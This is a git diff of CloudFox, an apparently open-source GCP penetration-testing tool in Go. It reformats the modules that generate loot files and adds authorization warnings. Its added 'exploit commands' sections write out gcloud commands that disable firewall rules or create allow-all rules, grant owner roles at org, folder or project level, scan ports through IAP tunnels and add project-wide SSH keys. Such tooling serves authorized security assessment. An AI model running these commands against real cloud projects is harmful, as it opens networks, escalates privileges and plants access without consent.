loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go index 67163bbe..10c541f4 100644 --- a/gcp/commands/firewall.go +++ b/gcp/commands/firewall.go @@ -174,7 +174,7 @@ func (m *FirewallModule) processProject(ctx context.Context, projectID string, l m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["firewall-commands"] = &internal.LootFile{ Name: "firewall-commands", - Contents: "# Firewall Commands\n# Generated by CloudFox\n\n", + Contents: "# Firewall Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } m.mu.Unlock() @@ -238,12 +238,15 @@ func (m *FirewallModule) addNetworkToLoot(projectID string, network NetworkServi } lootFile.Contents += fmt.Sprintf( - "# Network: %s\n"+ - "# Project: %s\n"+ + "# =============================================================================\n"+ + "# NETWORK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ "gcloud compute networks describe %s --project=%s\n"+ "gcloud compute networks subnets list --network=%s --project=%s\n"+ "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", - network.Name, network.ProjectID, + network.Name, + network.ProjectID, network.Name, network.ProjectID, network.Name, network.ProjectID, network.Name, network.ProjectID, @@ -257,11 +260,42 @@ func (m *FirewallModule) addFirewallRuleToLoot(projectID string, rule NetworkSer } lootFile.Contents += fmt.Sprintf( - "# Rule: %s (%s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# RULE: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Network: %s\n"+ "# Project: %s\n"+ - "gcloud compute firewall-rules describe %s --project=%s\n\n", - rule.Name, rule.Network, - rule.ProjectID, + "# Direction: %s\n"+ + "# Priority: %d\n"+ + "# Disabled: %v\n", + rule.Name, rule.Network, rule.ProjectID, + rule.Direction, rule.Priority, rule.Disabled, + ) + + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe rule:\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n\n"+ + "# List all rules for this network:\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s --sort-by=priority\n\n", + rule.Name, rule.ProjectID, + rule.Network, rule.ProjectID, + ) + + // Exploit commands + lootFile.Contents += fmt.Sprintf( + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Disable this firewall rule:\n"+ + "gcloud compute firewall-rules update %s --disabled --project=%s\n\n"+ + "# Create a permissive rule to allow all inbound traffic:\n"+ + "gcloud compute firewall-rules create cloudfox-allow-all --network=%s --allow=tcp,udp,icmp --source-ranges=0.0.0.0/0 --priority=1 --project=%s\n\n"+ + "# Create rule to allow SSH from your IP:\n"+ + "gcloud compute firewall-rules create cloudfox-ssh --network=%s --allow=tcp:22 --source-ranges=YOUR_IP/32 --priority=100 --project=%s\n\n"+ + "# Delete this firewall rule:\n"+ + "gcloud compute firewall-rules delete %s --project=%s\n\n", + rule.Name, rule.ProjectID, + rule.Network, rule.ProjectID, + rule.Network, rule.ProjectID, rule.Name, rule.ProjectID, ) } @@ -475,7 +509,7 @@ func (m *FirewallModule) writeHierarchicalOutput(ctx context.Context, logger int var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -512,7 +546,7 @@ func (m *FirewallModule) writeFlatOutput(ctx context.Context, logger internal.Lo var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index b209433a..dd317818 100755 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -194,11 +194,15 @@ func (m *FunctionsModule) addFunctionToLoot(projectID string, fn FunctionsServic // All commands for this function commandsLoot.Contents += fmt.Sprintf( - "#### Function: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n"+ + "# FUNCTION: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ "# Runtime: %s, Trigger: %s\n"+ "# Service Account: %s\n"+ "# Public: %v, Ingress: %s\n", - fn.Name, fn.ProjectID, fn.Region, + fn.Name, + fn.ProjectID, fn.Region, fn.Runtime, fn.TriggerType, fn.ServiceAccount, fn.IsPublic, fn.IngressSettings, @@ -213,7 +217,8 @@ func (m *FunctionsModule) addFunctionToLoot(projectID string, fn FunctionsServic } commandsLoot.Contents += fmt.Sprintf( - "\n# Describe function:\n"+ + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe function:\n"+ "gcloud functions describe %s --region=%s --project=%s --gen2\n"+ "# Get IAM policy:\n"+ "gcloud functions get-iam-policy %s --region=%s --project=%s --gen2\n"+ @@ -225,6 +230,7 @@ func (m *FunctionsModule) addFunctionToLoot(projectID string, fn FunctionsServic ) // HTTP invocation commands + commandsLoot.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { commandsLoot.Contents += fmt.Sprintf( "# Invoke (GET):\n"+ diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index 94b3120c..5c0aea3a 100755 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -182,7 +182,7 @@ func (m *GKEModule) processProject(ctx context.Context, projectID string, logger m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["gke-commands"] = &internal.LootFile{ Name: "gke-commands", - Contents: "# GKE Commands\n# Generated by CloudFox\n\n", + Contents: "# GKE Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -206,8 +206,11 @@ func (m *GKEModule) addClusterToLoot(projectID string, cluster GKEService.Cluste } lootFile.Contents += fmt.Sprintf( - "#### Cluster: %s (%s)\n"+ - "### Project: %s\n\n"+ + "# =============================================================================\n"+ + "# CLUSTER: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Get detailed cluster configuration and settings\n"+ "gcloud container clusters describe %s --location=%s --project=%s\n\n"+ "# Configure kubectl to authenticate to this cluster\n"+ @@ -221,10 +224,11 @@ func (m *GKEModule) addClusterToLoot(projectID string, cluster GKEService.Cluste "kubectl get nodes -o wide\n\n"+ "# List all namespaces in the cluster\n"+ "kubectl get namespaces\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ "# Check what actions you can perform in the cluster\n"+ "kubectl auth can-i --list\n\n", - cluster.Name, cluster.Location, - cluster.ProjectID, + cluster.Name, + cluster.ProjectID, cluster.Location, cluster.Name, cluster.Location, cluster.ProjectID, cluster.Name, cluster.Location, cluster.ProjectID, cluster.Name, cluster.Location, cluster.ProjectID, @@ -268,7 +272,7 @@ func (m *GKEModule) writeHierarchicalOutput(ctx context.Context, logger internal var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -306,7 +310,7 @@ func (m *GKEModule) writeFlatOutput(ctx context.Context, logger internal.Logger) var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/hiddenadmins.go b/gcp/commands/hiddenadmins.go index a0fea1b6..ea340048 100755 --- a/gcp/commands/hiddenadmins.go +++ b/gcp/commands/hiddenadmins.go @@ -718,15 +718,18 @@ func (m *HiddenAdminsModule) generatePlaybookForProject(projectID string) *inter var sb strings.Builder sb.WriteString("# GCP Hidden Admins Exploitation Playbook\n") sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) - sb.WriteString("# Generated by CloudFox\n\n") + sb.WriteString("# Generated by CloudFox\n") + sb.WriteString("# WARNING: Only use with proper authorization\n\n") // Add wrong admins section if available if len(wrongAdmins) > 0 { - sb.WriteString("## Wrong Admins (FoxMapper Analysis)\n\n") - sb.WriteString("These principals are marked as admin but don't have explicit admin roles.\n\n") + sb.WriteString("# === WRONG ADMINS (FOXMAPPER ANALYSIS) ===\n\n") + sb.WriteString("# These principals are marked as admin but don't have explicit admin roles.\n\n") for _, wa := range wrongAdmins { - sb.WriteString(fmt.Sprintf("### %s [%s]\n", wa.Principal, wa.MemberType)) + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s [%s]\n"+ + "# =============================================================================\n", wa.Principal, wa.MemberType)) sb.WriteString(fmt.Sprintf("Admin Level: %s\n", wa.AdminLevel)) for _, reason := range wa.Reasons { sb.WriteString(fmt.Sprintf(" - %s\n", reason)) @@ -735,31 +738,33 @@ func (m *HiddenAdminsModule) generatePlaybookForProject(projectID string) *inter // Add exploit command based on admin level switch wa.AdminLevel { case "org": - sb.WriteString("\n```bash\n") - sb.WriteString("# Grant yourself org-level owner:\n") - sb.WriteString(fmt.Sprintf("gcloud organizations add-iam-policy-binding ORG_ID --member='%s:%s' --role='roles/owner'\n", wa.MemberType, wa.Principal)) - sb.WriteString("```\n\n") + sb.WriteString("\n# Grant yourself org-level owner:\n") + orgID := wa.OrgID + if orgID == "" { + orgID = "ORG_ID" + } + sb.WriteString(fmt.Sprintf("gcloud organizations add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n\n", orgID, wa.MemberType, wa.Principal)) case "folder": - sb.WriteString("\n```bash\n") - sb.WriteString("# Grant yourself folder-level owner:\n") - sb.WriteString(fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member='%s:%s' --role='roles/owner'\n", wa.MemberType, wa.Principal)) - sb.WriteString("```\n\n") + sb.WriteString("\n# Grant yourself folder-level owner:\n") + folderID := wa.FolderID + if folderID == "" { + folderID = "FOLDER_ID" + } + sb.WriteString(fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n\n", folderID, wa.MemberType, wa.Principal)) default: - sb.WriteString("\n```bash\n") - sb.WriteString("# Grant yourself project-level owner:\n") + sb.WriteString("\n# Grant yourself project-level owner:\n") targetProject := wa.ProjectID if targetProject == "" { targetProject = projectID } - sb.WriteString(fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n", targetProject, wa.MemberType, wa.Principal)) - sb.WriteString("```\n\n") + sb.WriteString(fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member='%s:%s' --role='roles/owner'\n\n", targetProject, wa.MemberType, wa.Principal)) } } } // Add hidden admins section if len(admins) > 0 { - sb.WriteString("## Hidden Admins (IAM Modification Capabilities)\n\n") + sb.WriteString("# === HIDDEN ADMINS (IAM MODIFICATION CAPABILITIES) ===\n\n") for _, admin := range admins { scopeInfo := fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeName) @@ -767,13 +772,15 @@ func (m *HiddenAdminsModule) generatePlaybookForProject(projectID string) *inter scopeInfo = fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeID) } - sb.WriteString(fmt.Sprintf("### %s [%s]\n", admin.Principal, admin.PrincipalType)) + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s [%s]\n"+ + "# =============================================================================\n", admin.Principal, admin.PrincipalType)) sb.WriteString(fmt.Sprintf("Permission: %s\n", admin.Permission)) sb.WriteString(fmt.Sprintf("Category: %s\n", admin.Category)) sb.WriteString(fmt.Sprintf("Scope: %s\n", scopeInfo)) - sb.WriteString("\n```bash\n") + sb.WriteString("\n") sb.WriteString(admin.ExploitCommand) - sb.WriteString("\n```\n\n") + sb.WriteString("\n\n") } } diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go index 5a3bfa94..fc168948 100755 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -257,51 +257,18 @@ func (m *IAMModule) generateLoot() { var lootContent string if isHighPriv { lootContent = fmt.Sprintf( - "# Service Account: %s [HIGH PRIVILEGE] (%s)\n", + "# Service Account: %s [HIGH PRIVILEGE] (%s)\n"+ + "# See serviceaccounts-commands loot for describe/keys/impersonation commands\n\n", sb.MemberEmail, sb.Role, ) } else { - lootContent = fmt.Sprintf( - "# Service Account: %s\n", - sb.MemberEmail, - ) - } - - // Use project scope if available, otherwise use first project - projectID := sb.ScopeID - if sb.ScopeType != "project" && len(m.ProjectIDs) > 0 { - projectID = m.ProjectIDs[0] + continue // Skip non-high-privilege SAs — covered by serviceaccounts-commands loot } - lootContent += fmt.Sprintf( - "gcloud iam service-accounts describe %s --project=%s\n"+ - "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ - "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ - "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ - "gcloud auth print-access-token --impersonate-service-account=%s\n\n", - sb.MemberEmail, projectID, - sb.MemberEmail, projectID, - sb.MemberEmail, projectID, - sb.MemberEmail, projectID, - sb.MemberEmail, - ) - // Route loot to appropriate scope m.addToScopeLoot(sb.ScopeType, sb.ScopeID, "iam-commands", lootContent) } - // Add service accounts with keys (project-level) - for _, sa := range m.ServiceAccounts { - if sa.HasKeys { - lootContent := fmt.Sprintf( - "# Service Account with Keys: %s (Keys: %d)\n"+ - "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n", - sa.Email, sa.KeyCount, sa.Email, sa.ProjectID, - ) - m.addToScopeLoot("project", sa.ProjectID, "iam-commands", lootContent) - } - } - // Add custom roles (project-level) for _, role := range m.CustomRoles { lootContent := fmt.Sprintf( @@ -338,7 +305,7 @@ func (m *IAMModule) addToScopeLoot(scopeType, scopeID, lootName, content string) if lootMap[key] == nil { lootMap[key] = &internal.LootFile{ Name: lootName, - Contents: "# GCP IAM Commands\n# Generated by CloudFox\n\n", + Contents: "# GCP IAM Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: serviceaccounts-commands for SA-specific describe/keys/impersonation commands\n\n", } } lootMap[key].Contents += content @@ -349,9 +316,9 @@ func (m *IAMModule) generateEnumerationLoot() { for _, orgID := range m.OrgIDs { orgName := m.OrgNames[orgID] var lootContent string - lootContent += fmt.Sprintf("# =====================================================\n") + lootContent += fmt.Sprintf("# =============================================================================\n") lootContent += fmt.Sprintf("# Organization: %s (%s)\n", orgName, orgID) - lootContent += fmt.Sprintf("# =====================================================\n\n") + lootContent += fmt.Sprintf("# =============================================================================\n\n") lootContent += fmt.Sprintf("# List all IAM bindings for organization\n") lootContent += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json\n\n", orgID) @@ -369,9 +336,9 @@ func (m *IAMModule) generateEnumerationLoot() { for _, projectID := range m.ProjectIDs { projectName := m.GetProjectName(projectID) var lootContent string - lootContent += fmt.Sprintf("# =====================================================\n") + lootContent += fmt.Sprintf("# =============================================================================\n") lootContent += fmt.Sprintf("# Project: %s (%s)\n", projectName, projectID) - lootContent += fmt.Sprintf("# =====================================================\n\n") + lootContent += fmt.Sprintf("# =============================================================================\n\n") lootContent += fmt.Sprintf("# List all IAM bindings for project\n") lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json\n\n", projectID) @@ -440,9 +407,9 @@ func (m *IAMModule) generateEnumerationLoot() { // Add identity-specific enumeration commands per project for _, projectID := range m.ProjectIDs { var lootContent string - lootContent += fmt.Sprintf("# =====================================================\n") + lootContent += fmt.Sprintf("# =============================================================================\n") lootContent += fmt.Sprintf("# Identity-Specific Enumeration Commands\n") - lootContent += fmt.Sprintf("# =====================================================\n\n") + lootContent += fmt.Sprintf("# =============================================================================\n\n") for email, info := range identities { if info.memberType == "ServiceAccount" { @@ -860,7 +827,7 @@ func (m *IAMModule) collectAllLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range mergedLoot { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -939,7 +906,7 @@ func (m *IAMModule) collectLootFilesForProject(projectID string) []internal.Loot var lootFiles []internal.LootFile for _, loot := range mergedLoot { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go index 31659489..b9fe0229 100644 --- a/gcp/commands/iap.go +++ b/gcp/commands/iap.go @@ -89,7 +89,7 @@ func (m *IAPModule) processProject(ctx context.Context, projectID string, logger m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["iap-commands"] = &internal.LootFile{ Name: "iap-commands", - Contents: "# IAP Commands\n# Generated by CloudFox\n\n", + Contents: "# IAP Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } m.mu.Unlock() @@ -118,18 +118,78 @@ func (m *IAPModule) addToLoot(projectID string, group iapservice.TunnelDestGroup return } lootFile.Contents += fmt.Sprintf( - "## Tunnel Destination Group: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n"+ + "# TUNNEL DESTINATION GROUP: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Region: %s\n"+ "# CIDRs: %s\n"+ - "# FQDNs: %s\n\n"+ - "# Describe tunnel destination group:\n"+ - "gcloud iap tcp dest-groups describe %s --region=%s --project=%s\n\n"+ - "# List IAM policy for tunnel destination group:\n"+ - "gcloud iap tcp dest-groups get-iam-policy %s --region=%s --project=%s\n\n", + "# FQDNs: %s\n", group.Name, group.ProjectID, group.Region, strings.Join(group.CIDRs, ", "), strings.Join(group.FQDNs, ", "), + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe tunnel destination group: +gcloud iap tcp dest-groups describe %s --region=%s --project=%s + +# List IAM policy for tunnel destination group: +gcloud iap tcp dest-groups get-iam-policy %s --region=%s --project=%s + +# List all IAP tunnel resources in project: +gcloud iap tcp dest-groups list --region=%s --project=%s + +# Check who can use IAP tunnels in this project: +gcloud projects get-iam-policy %s --format=json | jq '.bindings[] | select(.role | contains("iap.tunnelResourceAccessor"))' + +`, group.Name, group.Region, group.ProjectID, group.Name, group.Region, group.ProjectID, - group.Name, group.Region, group.ProjectID, + group.Region, group.ProjectID, + group.ProjectID, + ) + + // === EXPLOIT COMMANDS - IAP Tunnel === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // SSH through IAP tunnel + for _, cidr := range group.CIDRs { + lootFile.Contents += fmt.Sprintf( + "# Start IAP TCP tunnel to hosts in CIDR %s:\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 22 --local-host-port=localhost:2222 --zone=ZONE --project=%s\n"+ + "ssh -p 2222 localhost\n\n", + cidr, group.ProjectID, + ) + } + + for _, fqdn := range group.FQDNs { + lootFile.Contents += fmt.Sprintf( + "# Start IAP TCP tunnel to %s:\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 22 --local-host-port=localhost:2222 --zone=ZONE --project=%s\n"+ + "ssh -p 2222 localhost\n\n", + fqdn, group.ProjectID, + ) + } + + lootFile.Contents += fmt.Sprintf( + "# SSH to a compute instance through IAP (direct):\n"+ + "gcloud compute ssh INSTANCE_NAME --tunnel-through-iap --zone=ZONE --project=%s\n\n"+ + "# Forward RDP through IAP (Windows instances):\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 3389 --local-host-port=localhost:3389 --zone=ZONE --project=%s\n\n"+ + "# Forward arbitrary port through IAP:\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 8080 --local-host-port=localhost:8080 --zone=ZONE --project=%s\n\n"+ + "# Port scan through IAP tunnel (test internal connectivity):\n"+ + "for PORT in 22 80 443 3306 5432 8080 8443; do\n"+ + " gcloud compute start-iap-tunnel INSTANCE_NAME $PORT --local-host-port=localhost:$PORT --zone=ZONE --project=%s &\n"+ + " sleep 1 && nc -z localhost $PORT 2>/dev/null && echo \"Port $PORT is open\" || echo \"Port $PORT is closed\"\n"+ + " kill %%1 2>/dev/null\n"+ + "done\n\n", + group.ProjectID, + group.ProjectID, + group.ProjectID, + group.ProjectID, ) } @@ -218,7 +278,7 @@ func (m *IAPModule) writeHierarchicalOutput(ctx context.Context, logger internal var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -251,7 +311,7 @@ func (m *IAPModule) writeFlatOutput(ctx context.Context, logger internal.Logger) var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/identityfederation.go b/gcp/commands/identityfederation.go index 0d520cef..24652071 100644 --- a/gcp/commands/identityfederation.go +++ b/gcp/commands/identityfederation.go @@ -229,13 +229,14 @@ func (m *IdentityFederationModule) addPoolToLoot(projectID string, pool workload status = "Disabled" } lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# FEDERATION POOL: %s\n"+ - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Display Name: %s\n"+ "# State: %s (%s)\n"+ - "# Description: %s\n"+ - "\n# Describe pool:\n"+ + "# Description: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe pool:\n"+ "gcloud iam workload-identity-pools describe %s --location=global --project=%s\n\n"+ "# List providers:\n"+ "gcloud iam workload-identity-pools providers list --workload-identity-pool=%s --location=global --project=%s\n\n", @@ -254,9 +255,9 @@ func (m *IdentityFederationModule) addProviderToLoot(projectID string, provider return } lootFile.Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# PROVIDER: %s/%s (%s)\n"+ - "# ------------------------------------------\n", + "# -----------------------------------------------------------------------------\n", provider.PoolID, provider.ProviderID, provider.ProviderType, ) @@ -276,13 +277,15 @@ func (m *IdentityFederationModule) addProviderToLoot(projectID string, provider lootFile.Contents += "# Attribute Condition: NONE (any identity from this provider can authenticate!)\n" } + lootFile.Contents += "\n# === ENUMERATION COMMANDS ===\n\n" lootFile.Contents += fmt.Sprintf( - "\n# Describe provider:\n"+ + "# Describe provider:\n"+ "gcloud iam workload-identity-pools providers describe %s --workload-identity-pool=%s --location=global --project=%s\n\n", provider.ProviderID, provider.PoolID, provider.ProjectID, ) // Add exploitation guidance based on provider type + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" switch provider.ProviderType { case "AWS": lootFile.Contents += fmt.Sprintf( @@ -317,9 +320,9 @@ func (m *IdentityFederationModule) addFederatedBindingToLoot(projectID string, b return } lootFile.Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# FEDERATED BINDING\n"+ - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# Pool: %s\n"+ "# GCP Service Account: %s\n"+ "# External Subject: %s\n\n", diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index d66a5c92..7cd9d8de 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -214,14 +214,14 @@ func (m *InstancesModule) addProjectMetadataToLoot(projectID string, meta *Compu } lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# PROJECT-LEVEL COMMANDS (Project: %s)\n"+ - "# ==========================================\n\n", + "# =============================================================================\n\n", meta.ProjectID, ) // --- PROJECT ENUMERATION --- - lootFile.Contents += "# --- PROJECT ENUMERATION ---\n" + lootFile.Contents += "# === PROJECT ENUMERATION ===\n\n" lootFile.Contents += fmt.Sprintf( "gcloud compute project-info describe --project=%s\n"+ "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n"+ @@ -238,7 +238,7 @@ func (m *InstancesModule) addProjectMetadataToLoot(projectID string, meta *Compu } // --- PROJECT-LEVEL EXPLOITATION --- - lootFile.Contents += "\n# --- PROJECT-LEVEL EXPLOITATION ---\n" + lootFile.Contents += "\n# === PROJECT-LEVEL EXPLOITATION ===\n\n" lootFile.Contents += fmt.Sprintf( "# Add project-wide SSH key (applies to all instances not blocking project keys)\n"+ "gcloud compute project-info add-metadata --project=%s --metadata=ssh-keys='USERNAME:SSH_PUBLIC_KEY'\n"+ @@ -264,9 +264,9 @@ func (m *InstancesModule) addProjectMetadataFullToLoot(projectID string, meta *C } lootFile.Contents += fmt.Sprintf( - "================================================================================\n"+ - "PROJECT METADATA: %s\n"+ - "================================================================================\n\n", + "# =============================================================================\n"+ + "# PROJECT METADATA: %s\n"+ + "# =============================================================================\n\n", meta.ProjectID, ) @@ -296,14 +296,13 @@ func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEn } lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# INSTANCE: %s (Zone: %s)\n"+ - "# ==========================================\n\n", + "# =============================================================================\n\n", instance.Name, instance.Zone, ) - // --- ENUMERATION --- - lootFile.Contents += "# --- ENUMERATION ---\n" + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" lootFile.Contents += fmt.Sprintf( "gcloud compute instances describe %s --zone=%s --project=%s\n"+ "gcloud compute instances get-iam-policy %s --zone=%s --project=%s\n"+ @@ -313,8 +312,7 @@ func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEn instance.Name, instance.Zone, instance.ProjectID, ) - // --- METADATA ENUMERATION --- - lootFile.Contents += "\n# --- METADATA ENUMERATION ---\n" + lootFile.Contents += "\n# === METADATA ENUMERATION ===\n\n" lootFile.Contents += fmt.Sprintf( "gcloud compute instances describe %s --zone=%s --project=%s --format='value(metadata.items)'\n", instance.Name, instance.Zone, instance.ProjectID, @@ -328,8 +326,7 @@ func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEn ) } - // --- CODE EXECUTION / ACCESS --- - lootFile.Contents += "\n# --- CODE EXECUTION / ACCESS ---\n" + lootFile.Contents += "\n# === CODE EXECUTION / ACCESS ===\n\n" // SSH with external IP if instance.ExternalIP != "" { @@ -377,8 +374,7 @@ func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEn instance.Name, instance.Zone, instance.ProjectID, ) - // --- EXPLOITATION / PERSISTENCE --- - lootFile.Contents += "\n# --- EXPLOITATION / PERSISTENCE ---\n" + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" // Startup script injection lootFile.Contents += fmt.Sprintf( @@ -426,9 +422,9 @@ func (m *InstancesModule) addInstanceMetadataToLoot(projectID string, instance C } lootFile.Contents += fmt.Sprintf( - "================================================================================\n"+ - "INSTANCE: %s (Zone: %s)\n"+ - "================================================================================\n\n", + "# =============================================================================\n"+ + "# INSTANCE: %s (Zone: %s)\n"+ + "# =============================================================================\n\n", instance.Name, instance.Zone, ) @@ -471,9 +467,9 @@ func (m *InstancesModule) addInstanceSSHKeysToLoot(projectID string, instance Co } lootFile.Contents += fmt.Sprintf( - "================================================================================\n"+ - "INSTANCE: %s (Zone: %s)\n"+ - "================================================================================\n", + "# =============================================================================\n"+ + "# INSTANCE: %s (Zone: %s)\n"+ + "# =============================================================================\n", instance.Name, instance.Zone, ) @@ -495,9 +491,9 @@ func (m *InstancesModule) addProjectSSHKeysToLoot(projectID string, meta *Comput } lootFile.Contents += fmt.Sprintf( - "================================================================================\n"+ - "PROJECT-LEVEL SSH KEYS (apply to all instances not blocking project keys)\n"+ - "================================================================================\n", + "# =============================================================================\n"+ + "# PROJECT-LEVEL SSH KEYS (apply to all instances not blocking project keys)\n"+ + "# =============================================================================\n", ) for _, key := range meta.ProjectSSHKeys { diff --git a/gcp/commands/keys.go b/gcp/commands/keys.go index 9eb474f2..c234f276 100755 --- a/gcp/commands/keys.go +++ b/gcp/commands/keys.go @@ -271,7 +271,7 @@ func (m *KeysModule) processProject(ctx context.Context, projectID string, logge } m.LootMap[projectID]["keys-enumeration-commands"] = &internal.LootFile{ Name: "keys-enumeration-commands", - Contents: "# Key Enumeration Commands\n# Generated by CloudFox\n\n", + Contents: "# Key Enumeration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go index b1bc680e..af23e7d5 100644 --- a/gcp/commands/kms.go +++ b/gcp/commands/kms.go @@ -209,16 